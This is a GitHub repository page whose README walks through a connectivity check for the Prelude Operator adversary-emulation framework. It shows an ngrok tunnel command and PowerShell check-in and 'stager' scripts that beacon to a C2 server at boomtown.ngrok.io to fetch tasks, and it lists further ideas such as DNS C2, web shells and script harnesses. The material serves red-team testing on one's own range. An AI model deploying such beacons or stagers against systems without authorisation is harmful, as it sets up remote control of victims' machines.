Skip to content

invokethreatguy/PreludeOperator_QuickCheck

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

51 Commits
hta
hta
 
 
jscript
jscript
 
 
psh
psh
 
 
xslt
xslt
 
 
README.md
README.md
 
 

Repository files navigation

PreludeOperator_QuickCheck

Simple Powershell Prelude Operator Quick Check

In this example, we will use boomtown.ngrok.io There are a couple ways to redirect HTTP.
You should replace this with either your ngrok instance or your redirector. The preferred method is a Gateway Redirector.

Cloudy with a chance of redirectors

Create a TTP

Screen Shot 2021-06-25 at 7 37 13 PM

Create an Adversary - Add The TTP

Screen Shot 2021-06-25 at 7 43 38 PM

Ensure Your Prelude Operator is Reachable over HTTP

Ngrok Example -

ngrok http --region=us --hostname=boomtown.ngrok.io 3391

Deploy a Cloud Gateway Redirector

{TODO}

Execute Checkin PowerShell

$PreludeHTTPDomain = "https://boomtown.ngrok.io"
$Executors = @()
$Executors += 'psh'
$Links = @()

$jsonBase = [pscustomobject]@{
    Name = "Boomer"
    Target = ""
    Hostname = "APTz"
    Location = ""
    Platform = "windows"
    Executors = $executors
    Range = "BoomTown"
	"Pwd" = ""
	"Sleep" = 10
	Executing= ""
    Links = $Links

}

$delivery = $jsonBase | ConvertTo-Json
# Checkin - Get Task

$response = Invoke-RestMethod -Uri $PreludeHTTPDomain -Method Post -Body $delivery -ContentType "application/json"
$ID = $response.links.ID

You should have a call back

Deploy The Adversary To Your BoomTown Range

Screen Shot 2021-06-25 at 7 47 08 PM

Run The PowerShell Simple Stager


$PreludeHTTPDomain = "https://boomtown.ngrok.io"
$Executors = @()
$Executors += 'psh'
$Links = @()

$jsonBase = [pscustomobject]@{
    Name = "Boomer"
    Target = ""
    Hostname = "APTz"
    Location = ""
    Platform = "windows"
    Executors = $executors
    Range = "BoomTown"
	"Pwd" = ""
	"Sleep" = 10
	Executing= ""
    Links = $Links

}

$delivery = $jsonBase | ConvertTo-Json
# Checkin - Get Task

$response = Invoke-RestMethod -Uri $PreludeHTTPDomain -Method Post -Body $delivery -ContentType "application/json"
$ID = $response.links.ID


# Send Response
$Links += [pscustomobject]@{
    'ID'="$ID";
    'Executor'='psh';
	'Payload'=''
	'Request'= ""
    'Response'="Ready To Roll Out!";
    'Status'='0';
    'Pid'="$Pid"
}

$jsonBase = [pscustomobject]@{
    Name = "Boomer"
    Target = ""
    Hostname = "APTz"
    Location = ""
    Platform = "windows"
    Executors = $executors
    Range = "BoomTown"
	"Pwd" = ""
	"Sleep" = 10
	Executing= ""
    Links = $Links

}

$deliveryResponse = $jsonBase | ConvertTo-Json
$response_delivery = Invoke-RestMethod -Uri $PreludeHTTPDomain -Method Post -Body $deliveryResponse  -ContentType "application/json"

Check Status

Screen Shot 2021-06-25 at 7 49 29 PM

Screen Shot 2021-06-25 at 7 49 41 PM

Conclusion

The aim here is to help ensure you are up and running quick. Once you pass the check you are ready to start deploying more aggressive tests.

This is pretty rough, and can be better, but its a start ;-) Feedback Welcome. -Additional Idea:

Fiddler debugging

Simple DNS C2, etc..

WebShell

WSH Harnesses, JSScript, VBScript, VBA, HTA, SCT etc...

These are just some prototypes.

About

Simple Powershell Prelude Operator Quick Check

Resources

Readme
Activity

Stars

7 stars

Watchers

0 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages